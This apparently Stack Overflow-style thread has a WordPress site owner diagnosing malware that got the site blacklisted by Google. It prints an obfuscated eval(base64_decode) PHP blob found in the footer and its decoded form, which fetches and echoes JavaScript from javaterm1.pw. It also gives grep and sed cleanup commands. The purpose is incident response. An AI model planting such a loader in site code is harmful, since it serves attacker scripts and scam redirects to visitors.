# Malware in website flagged by google

Tags: javascript, html, wordpress, malware

Here is the screenshot of links detected as malware by google:
[image]

I am working on a website [ExclusivelyHybrid](http://exclusivelyhybrid.com)

It had adwords linked to it. Suddenly google blacklisted the website and said that their servers were hit by a malware from the website.

Crossed checked on website scanners, No malware found.

Asked google to scan it they too did not find any malware on the site.
Then asked hostgator to deep scan it they also did not find any malware.

Google agreed to again start the adword campaign but they were again hit by malware and blacklisted the site.

A coder at hostgator inspected the site and found 3 links that were causing trouble.

I have the links but on clicking on them pc will get infected(should i share the links here?)

I have searched the entire source code and all the javascripts of the site no such links were found.

Can anyone help with suggestions to where and in which files those links can be?

Here i what i found in the footer in my site:

```
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
```

It decodes to:

```
if(function_exists('curl_init'))
{
    $url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}
```

Comment: Yeah. As soon as I hit your site I get redirected to something that's being filtered at work. Check your scripts!

Comment: You can share a screenshot (picture) showing the links. I suggest you to pay attention to the file last modified date . Files that doesn't need to be modified and are modified at the same date, probably are infected

Comment: Just for the record. -1 for having a pop up on exit.

Comment: That was asked by the client so had to put it.

Answer (score 1, accepted):

Don't use website scanner. They don't work correctly.
You have to take a look into your access log.

Before you take a look into the log you can use the shell.
Search for this string:

rgrep 'eval(gzinflate(base64_decode' * -l

If you find something you can delete it with this string:

find ./ -type f -exec sed -i '/eval(gzinflate(base64_decode/d' {} \;

After that you delete the access log, restart the apache and if the malware is back you take a look into the access log.
In my case the malware was there:

[30/Jul/2015:11:57:13 +0200] "POST /wp-content/themes/skeleton/404.php

Comment: Yes there is something in my website with basecode64

Comment: Thats the malware.. delete it everywhere!
If the malware comes back you have to search in the access log.

Comment: I have edited the post and written the base64 code that i found on my website can you tell me if its a malware or not?

Answer (score 0):

You **definitely** have suspicious behaviour on that website. I just got redirected to a fraudulent 'scam' "You are our 100kth visitor on Firefox".

I didn't press a button or anything.

Look for Javascript code being inserted in, insert a basic HTML page from scratch and see if the issue persists.

Comment: same here. I got a redirect.

Comment: Doesn't happen on a second connection, perhaps they've given me a cookie to register that I've already *"won"*.

Comment: I am editing the post with the sreenshot of urls.
But as you all are saying redirecting.. That doesnt happen in my browser i am using chrome

Comment: @YashThakur It doesn't seem to redirect after you visit once. Sounds like it's adding to a whitelist of whom not to 'retry', that way it's fairly transparent when *you* the webdev comes and tries to solve it.